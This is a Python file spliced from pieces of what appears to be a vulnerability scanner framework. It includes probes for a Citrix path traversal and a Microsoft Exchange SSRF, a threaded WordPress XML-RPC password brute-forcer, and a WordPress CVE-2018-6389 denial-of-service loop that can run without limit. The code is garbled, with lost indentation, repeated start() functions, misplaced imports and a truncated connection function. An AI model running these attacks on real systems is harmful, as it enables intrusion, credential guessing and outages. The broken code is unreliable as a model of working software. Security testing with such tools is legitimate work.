def graphql(target, port, timeout_sec, socks_proxy):
try:
s = conn(target_to_host(target), port, timeout_sec, socks_proxy)
if not s:
return False
else:
if target_type(target) != "HTTP" and port == 443:
target = 'https://' + target
if target_type(target) != "HTTP" and port == 80:
target = 'http://' + target
headers = {
"User-Agent": random.choice(useragents()),
"Accept":
"text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,image/apng,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.9",
"Accept-Encoding": "gzip, deflate, br",
}
query = """{
__schema {
types {
name
}
}
}
"""
params = {"query": query, "variables": "{}"}
tempTarget = target
global final_endpoint
final_endpoint = ''
for endpoint in graphql_list():
tempTarget += endpoint
try:
req = requests.post(tempTarget,
json=params,
headers=headers,
verify=False,
timeout=timeout_sec)
tempTarget = target
except Exception:
return False
else:
if req.status_code == 200:
json_data = json.loads(req.text)
if json_data.get('data') or json_data.get('errors'):
return True
return False
except Exception:
# some error warning
return False
def content_policy(target, port, timeout_sec, log_in_file, language,
time_sleep, thread_tmp_filename, socks_proxy, scan_id,
scan_cmd, check_source_flag):
try:
s = conn(target, port, timeout_sec, socks_proxy)
global weak
weak = False
if not s:
return False
else:
if target_type(target) != "HTTP" and port == 443:
target = 'https://' + target
if target_type(target) != "HTTP" and port == 80:
target = 'http://' + target
headers = {'User-agent': random.choice(useragents.useragents())}
req = requests.get(target,
headers=headers,
timeout=timeout_sec,
verify=False)
try:
weak = False
csp = req.headers['Content-Security-Policy']
if 'unsafe-inline' in csp or 'unsafe-eval' in csp:
weak = True
return False
except Exception as e:
if check_source_flag:
soup = BeautifulSoup(req.text, "html.parser")
meta_tags = soup.find_all(
'meta', {'http-equiv': 'Content-Security-Policy'})
if len(meta_tags) == 0:
return True
directives = meta_tags[0].attrs['content']
if 'unsafe-inline' in directives or 'unsafe-eval' in directives:
weak = True
return False
else:
return True
except Exception as e:
# some error warning
return False
def simple_test_open_url(url):
"""
Simply open a URL using GET request.
Args:
url: url to open
Returns:
True if response available, otherwise False
"""
try:
return requests.get(url,
headers={
"User-Agent":
random.choice(useragents.useragents())
}).status_code
except Exception as _:
return False
def citrix_vuln(target, port, timeout_sec, log_in_file, language, time_sleep,
thread_tmp_filename, socks_proxy, scan_id, scan_cmd):
try:
s = conn(target, port, timeout_sec, socks_proxy)
if not s:
return False
else:
if target_type(target) != "HTTP" and port == 443:
target = 'https://' + target
if target_type(target) != "HTTP" and port == 80:
target = 'http://' + target
user_agent_list = useragents.useragents()
user_agent = {'User-agent': random.choice(user_agent_list)}
# as a pre-requisite check that CSS return the word citrix
req0_url = target + '/vpn/js/rdx/core/css/rdx.css'
req0 = requests.get(req0_url,
timeout=10,
headers=user_agent,
verify=False)
if req0.status_code == 200 and 'citrix' in req0.text.lower():
info('Citrix appliance detected: ' + target)
# now check if response code 200 is returned for the following url:
req_url = target + '/vpn/../vpns/cfg/smb.conf'
req = requests.get(req_url,
timeout=10,
headers=user_agent,
verify=False)
if req.status_code == 200 and 'lmhosts' in req.text.lower():
return True
else:
return False
else:
return False
except Exception as e:
# some error warning
return False
def msexchange_vuln(target, port, timeout_sec, log_in_file, language,
time_sleep, thread_tmp_filename, socks_proxy, scan_id,
scan_cmd):
try:
s = conn(target, port, timeout_sec, socks_proxy)
if not s:
return False
else:
if target_type(target) != "HTTP" and port == 443:
target = 'https://' + target
if target_type(target) != "HTTP" and port == 80:
target = 'http://' + target
cookies = {
"X-AnonResource": "true",
"X-AnonResource-Backend": "localhost/ecp/default.flt?~3",
"X-BEResource": "localhost/owa/auth/logon.aspx?~3",
}
headers = {'User-agent': random.choice(useragents.useragents())}
if target.endswith("/"):
target = target[:-1]
path = '/owa/auth/x.js'
req = requests.get(target + path,
cookies=cookies,
verify=False,
headers=headers,
timeout=timeout_sec)
if req.status_code in [500, 503]:
try:
header_server = req.headers['x-calculatedbetarget']
if 'localhost' in header_server or "NegotiateSecurityContext" in req.text:
return True
else:
return False
except Exception as e:
return False
except Exception as e:
warn(messages(language, 'no_response'))
return False
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language,
verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function
if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type(
target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6':
# rand useragent
user_agent_list = useragents.useragents()
headers = {'User-agent': random.choice(user_agent_list), 'Content-Type': 'text/xml'}
# requirements check
new_extra_requirements = extra_requirements_dict()
if methods_args is not None:
for extra_requirement in extra_requirements_dict():
if extra_requirement in methods_args:
new_extra_requirements[
extra_requirement] = methods_args[extra_requirement]
extra_requirements = new_extra_requirements
threads = []
if users is None:
users = extra_requirements["wp_users"]
if passwds is None:
passwds = extra_requirements["wp_passwds"]
if ports is None:
ports = extra_requirements["wp_xmlrpc_brute_ports"]
if verbose_level > 3:
total_req = len(users) * len(passwds) * len (ports)
else:
total_req = len(users) * len(passwds) * len(ports)
thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join(
random.choice(string.ascii_letters + string.digits) for _ in range(20))
__log_into_file(thread_tmp_filename, 'w', '1', language)
trying = 0
if target_type(target) != "HTTP":
target = 'https://' + target
for port in ports:
if test(str(target), port, retries, timeout_sec, headers,
socks_proxy, verbose_level, trying, total_req, total, num, language) == True:
keyboard_interrupt_flag = False
for user in users:
for passwd in passwds:
#print(user + " " + passwd)
t = threading.Thread(target=check,
args=(
user, passwd, target, port, headers, timeout_sec, log_in_file, language,
retries, time_sleep, thread_tmp_filename, socks_proxy,
scan_id, scan_cmd))
threads.append(t)
t.start()
trying += 1
if verbose_level > 3:
info(messages(language, "trying_message").format(trying, total_req, num, total, target_to_host(target),
port, 'wp_xmlrpc_brute'))
while 1:
try:
if threading.activeCount() >= thread_number:
time.sleep(0.01)
else:
break
except KeyboardInterrupt:
keyboard_interrupt_flag = True
break
if keyboard_interrupt_flag:
break
else:
warn(messages(language, "open_error").format(target))
# wait for threads
kill_switch = 0
kill_time = int(
timeout_sec / 0.1) if int(timeout_sec / 0.1) != 0 else 1
while 1:
time.sleep(0.1)
kill_switch += 1
try:
if threading.activeCount() == 1 or kill_switch == kill_time:
break
except KeyboardInterrupt:
break
thread_write = int(open(thread_tmp_filename).read().rsplit()[0])
os.remove(thread_tmp_filename)
else:
warn(messages(language, "input_target_error").format(
'wp_xmlrpc_brute', target))
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language,
verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function
if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type(
target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6':
# rand useragent
user_agent_list = useragents()
headers = {'User-agent': random.choice(user_agent_list), 'Content-Type': 'text/xml'}
# requirements check
new_extra_requirements = extra_requirements_dict()
if methods_args is not None:
for extra_requirement in extra_requirements_dict():
if extra_requirement in methods_args:
new_extra_requirements[
extra_requirement] = methods_args[extra_requirement]
extra_requirements = new_extra_requirements
threads = []
if ports is None:
ports = extra_requirements["wp_xmlrpc_dos_vuln_ports"]
if verbose_level > 3:
total_req = len(ports)
else:
total_req = len(ports)
thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join(
random.choice(string.ascii_letters + string.digits) for _ in range(20))
__log_into_file(thread_tmp_filename, 'w', '1', language)
trying = 0
if target_type(target) != "HTTP":
target = 'https://' + target
for port in ports:
if test(str(target), port, headers, socks_proxy) is True:
keyboard_interrupt_flag = False
t = threading.Thread(target=check, args=(target, port, headers, timeout_sec, log_in_file, language, retries, time_sleep, thread_tmp_filename, socks_proxy, scan_id, scan_cmd))
threads.append(t)
t.start()
trying += 1
if verbose_level > 3:
info(messages(language, "trying_message").format(trying, total_req, num, total, target_to_host(target), port, 'wp_xmlrpc_dos_vuln'))
while 1:
try:
if threading.activeCount() >= thread_number:
time.sleep(0.01)
else:
break
except KeyboardInterrupt:
keyboard_interrupt_flag = True
break
if keyboard_interrupt_flag:
break
else:
warn(messages(language, "open_error").format(target))
# wait for threads
kill_switch = 0
kill_time = int(
timeout_sec / 0.1) if int(timeout_sec / 0.1) != 0 else 1
while 1:
time.sleep(0.1)
kill_switch += 1
try:
if threading.activeCount() == 1 or kill_switch == kill_time:
break
except KeyboardInterrupt:
break
thread_write = int(open(thread_tmp_filename).read().rsplit()[0])
if thread_write == 1 and verbose_level != 0:
info(messages(language, "no_vulnerability_found").format(
'XML-RPC'))
data = json.dumps({'HOST': target, 'USERNAME': '', 'PASSWORD': '', 'PORT': port, 'TYPE': 'wp_xmlrpc_dos_vuln', 'DESCRIPTION': messages(language, "no_vulnerability_found").format("XML-RPC DOS attacks"), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id, 'SCAN_CMD': scan_cmd}) + "\n"
__log_into_file(log_in_file, 'a', data, language)
os.remove(thread_tmp_filename)
else:
warn(messages(language, "input_target_error").format(
'wp_xmlrpc_dos_vuln', target))
def start(target, users, passwds, ports, timeout_sec, thread_number, num, total, log_in_file, time_sleep, language,
verbose_level, socks_proxy, retries, methods_args, scan_id, scan_cmd): # Main function
if target_type(target) != 'SINGLE_IPv4' or target_type(target) != 'DOMAIN' or target_type(
target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6':
# rand useragent
user_agent_list = useragents.useragents()
http_methods = ["GET", "HEAD"]
user_agent = {'User-agent': random.choice(user_agent_list)}
# requirements check
new_extra_requirements = extra_requirements_dict()
if methods_args is not None:
for extra_requirement in extra_requirements_dict():
if extra_requirement in methods_args:
new_extra_requirements[
extra_requirement] = methods_args[extra_requirement]
extra_requirements = new_extra_requirements
if extra_requirements["dir_scan_http_method"][0] not in http_methods:
warn(messages(language, "dir_scan_get"))
extra_requirements["dir_scan_http_method"] = ["GET"]
random_agent_flag = True
if extra_requirements["dir_scan_random_agent"][0] == "False":
random_agent_flag = False
threads = []
total_req = len(extra_requirements["dir_scan_list"])
thread_tmp_filename = '{}/tmp/thread_tmp_'.format(load_file_path()) + ''.join(
random.choice(string.ascii_letters + string.digits) for _ in range(20))
__log_into_file(thread_tmp_filename, 'w', '1', language)
trying = 0
if target_type(target) != "HTTP":
target = 'http://' + target
if test(str(target), retries, timeout_sec, user_agent, extra_requirements["dir_scan_http_method"][0],
socks_proxy, verbose_level, trying, total_req, total, num, language) == 0:
keyboard_interrupt_flag = False
for idir in extra_requirements["dir_scan_list"]:
if random_agent_flag:
user_agent = {'User-agent': random.choice(user_agent_list)}
if target.endswith("/"):
target = target[:-1]
if idir.startswith("/"):
idir = idir[1:]
t = threading.Thread(target=check,
args=(
target + '/' + idir, user_agent, timeout_sec, log_in_file, language,
time_sleep, thread_tmp_filename, retries,
extra_requirements[
"dir_scan_http_method"][0],
socks_proxy, scan_id, scan_cmd))
threads.append(t)
t.start()
trying += 1
if verbose_level > 3:
info(messages(language, "trying_message").format(trying, total_req, num, total, target_to_host(target),
"default_port", 'dir_scan'))
while 1:
try:
if threading.activeCount() >= thread_number:
time.sleep(0.01)
else:
break
except KeyboardInterrupt:
keyboard_interrupt_flag = True
break
if keyboard_interrupt_flag:
break
else:
warn(messages(language, "open_error").format(target))
# wait for threads
kill_switch = 0
kill_time = int(
timeout_sec / 0.1) if int(timeout_sec / 0.1) != 0 else 1
while 1:
time.sleep(0.1)
kill_switch += 1
try:
if threading.activeCount() == 1 or kill_switch == kill_time:
break
except KeyboardInterrupt:
break
thread_write = int(open(thread_tmp_filename).read().rsplit()[0])
if thread_write == 1:
info(messages(language, "directory_file_404").format(
target, "default_port"))
if verbose_level != 0:
data = json.dumps(
{'HOST': target_to_host(target), 'USERNAME': '', 'PASSWORD': '', 'PORT': '', 'TYPE': 'dir_scan',
'DESCRIPTION': messages(language, "no_open_ports"), 'TIME': now(), 'CATEGORY': "scan", 'SCAN_ID': scan_id,
'SCAN_CMD': scan_cmd})
__log_into_file(log_in_file, 'a', data, language)
os.remove(thread_tmp_filename)
else:
warn(messages(language, "input_target_error").format('dir_scan', target))
def start(
target,
users,
passwds,
ports,
timeout_sec,
thread_number,
num,
total,
log_in_file,
time_sleep,
language,
verbose_level,
socks_proxy,
retries,
methods_args,
scan_id,
scan_cmd,
): # Main function
if (
target_type(target) != "SINGLE_IPv4"
or target_type(target) != "DOMAIN"
or target_type(target) != "HTTP"
or target_type(target) != "SINGLE_IPv6"
):
# rand useragent
http_methods = ["GET", "HEAD"]
# requirements check
new_extra_requirements = extra_requirements_dict()
if methods_args is not None:
for extra_requirement in extra_requirements_dict():
if extra_requirement in methods_args:
new_extra_requirements[extra_requirement] = methods_args[
extra_requirement
]
extra_requirements = new_extra_requirements
if extra_requirements["pma_scan_http_method"][0] not in http_methods:
warn(messages(language, "dir_scan_get"))
extra_requirements["pma_scan_http_method"] = ["GET"]
thread_tmp_filename = "{}/tmp/thread_tmp_".format(
load_file_path()
) + "".join(
random.choice(string.ascii_letters + string.digits)
for _ in range(20)
)
__log_into_file(thread_tmp_filename, "w", "1", language)
default_ports = [80, 443]
request = """{0} __target_locat_here__{{0}} \
HTTP/1.1\nUser-Agent: {1}\n\n""".format(
extra_requirements["pma_scan_http_method"][0],
random.choice(useragents.useragents())
if extra_requirements["pma_scan_random_agent"][0].lower() == "true"
else "Mozilla/5.0 (Windows; U; Windows NT 5.1; \
en-US; rv:1.8.0.5) Gecko/20060719 Firefox/1.5.0.5",
)
status_codes = [200, 401, 403]
condition = "response.status_code in {0}".format(status_codes)
message = messages(language, "found")
sample_message = (
'"'
+ message
+ '"'
+ """.format(response.url, response.status_code,\
response.reason)"""
)
sample_event = {
"HOST": target_to_host(target),
"USERNAME": "",
"PASSWORD": "",
"PORT": "PORT",
"TYPE": "pma_scan",
"DESCRIPTION": sample_message,
"TIME": now(),
"CATEGORY": "scan",
"SCAN_ID": scan_id,
"SCAN_CMD": scan_cmd,
}
counter_message = messages(language, "phpmyadmin_dir_404")
__repeater(
request,
[extra_requirements["pma_scan_list"]],
timeout_sec,
thread_number,
log_in_file,
time_sleep,
language,
verbose_level,
socks_proxy,
retries,
scan_id,
scan_cmd,
condition,
thread_tmp_filename,
sample_event,
sample_message,
target,
ports,
default_ports,
counter_message,
)
else:
warn(
messages(language, "input_target_error").format("pma_scan", target)
)
import struct
import re
import os
from OpenSSL import crypto
import ssl
from core.alert import *
from core.targets import target_type
from core.targets import target_to_host
from core.load_modules import load_file_path
from lib.socks_resolver.engine import getaddrinfo
from core._time import now
from core.log import __log_into_file
import requests
from lib.payload.wordlists import useragents
USER_AGENT = {'User-agent': random.choice(useragents.useragents())}
def extra_requirements_dict():
return {"cms_detection_ports": [80, 443]}
def conn(targ, port, timeout_sec, socks_proxy):
try:
if socks_proxy is not None:
socks_version = socks.SOCKS5 if socks_proxy.startswith(
'socks5://') else socks.SOCKS4
socks_proxy = socks_proxy.rsplit('://')[1]
if '@' in socks_proxy:
socks_username = socks_proxy.rsplit(':')[0]
socks_password = socks_proxy.rsplit(':')[1].rsplit('@')[0]
def start(target, users, passwds, ports, timeout_sec, thread_number, num,
total, log_in_file, time_sleep, language, verbose_level, socks_proxy,
retries, methods_args, scan_id, scan_cmd): # Main function
if target_type(target) != 'SINGLE_IPv4' or target_type(
target) != 'DOMAIN' or target_type(
target) != 'HTTP' or target_type(target) != 'SINGLE_IPv6':
# rand useragent
user_agent_list = useragents.useragents()
user_agent = {'User-agent': random.choice(user_agent_list)}
limit = 1000
# requirements check
new_extra_requirements = extra_requirements_dict()
if methods_args is not None:
for extra_requirement in extra_requirements_dict():
if extra_requirement in methods_args:
new_extra_requirements[extra_requirement] = methods_args[
extra_requirement]
extra_requirements = new_extra_requirements
random_agent_flag = True
if extra_requirements["wordpress_dos_cve_2018_6389_vuln_random_agent"][
0] != "True":
random_agent_flag = False
if extra_requirements["wordpress_dos_cve_2018_6389_vuln_no_limit"][
0] != "False":
limit = -1
threads = []
total_req = limit
filepath = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
thread_tmp_filename = '{}/tmp/thread_tmp_'.format(
load_file_path()) + ''.join(
random.choice(string.ascii_letters + string.digits)
for _ in range(20))
__log_into_file(thread_tmp_filename, 'w', '1', language)
trying = 0
if target_type(target) == 'SINGLE_IPv4' or target_type(
target) == 'DOMAIN':
url = 'http://{0}/'.format(target)
else:
if target.count(':') > 1:
__die_failure(messages(language, "insert_port_message"))
http = target.rsplit('://')[0]
host = target_to_host(target)
path = "/".join(
target.replace('http://', '').replace('https://',
'').rsplit('/')[1:])
url = http + '://' + host + '/' + path
if test(url, retries, timeout_sec, user_agent, socks_proxy,
verbose_level, trying, total_req, total, num, language, False,
log_in_file, scan_id, scan_cmd, thread_tmp_filename) != 0:
warn(messages(language, "open_error").format(url))
return
info(messages(language, "DOS_send").format(target))
n = 0
t = threading.Thread(
target=test,
args=(url, retries, timeout_sec, user_agent, socks_proxy,
verbose_level, trying, total_req, total, num, language, True,
log_in_file, scan_id, scan_cmd, thread_tmp_filename))
t.start()
keyboard_interrupt_flag = False
while (n != limit):
n += 1
if random_agent_flag:
user_agent = {'User-agent': random.choice(user_agent_list)}
t = threading.Thread(target=send_dos,
args=(url, user_agent, timeout_sec,
log_in_file, language, time_sleep,
thread_tmp_filename, retries,
socks_proxy, scan_id, scan_cmd))
threads.append(t)
t.start()
trying += 1
if verbose_level > 3:
info(
messages(language, "trying_message").format(
trying, total_req, num, total, target_to_host(target),
port, 'wordpress_dos_cve_2018_6389_vuln'))
try:
if int(open(thread_tmp_filename).read().rsplit()[0]) == 0:
if limit != -1:
break
except Exception:
pass
while 1:
try:
if threading.activeCount() >= thread_number:
time.sleep(0.01)
else:
break
except KeyboardInterrupt:
keyboard_interrupt_flag = True
break
if keyboard_interrupt_flag:
break
# wait for threads
kill_switch = 0
kill_time = int(timeout_sec /
0.1) if int(timeout_sec / 0.1) != 0 else 1
while 1:
time.sleep(0.1)
kill_switch += 1
try:
if threading.activeCount() == 2 or kill_switch == kill_time:
break
except KeyboardInterrupt:
break
thread_write = int(open(thread_tmp_filename).read().rsplit()[0])
if thread_write == 1:
info(
messages(language, "no_vulnerability_found").format(
"wordpress_dos_cve_2018_6389_vuln"))
if verbose_level != 0:
data = json.dumps({
'HOST':
target,
'USERNAME':
'',
'PASSWORD':
'',
'PORT':
'',
'TYPE':
'wordpress_dos_cve_2018_6389_vuln',
'DESCRIPTION':
messages(language, "no_vulnerability_found").format(
"wordpress_dos_cve_2018_6389_vuln"),
'TIME':
now(),
'CATEGORY':
"scan",
'SCAN_ID':
scan_id,
'SCAN_CMD':
scan_cmd
})
__log_into_file(log_in_file, 'a', data, language)
os.remove(thread_tmp_filename)
else:
warn(
messages(language, "input_target_error").format(
'wordpress_dos_cve_2018_6389_vuln', target))
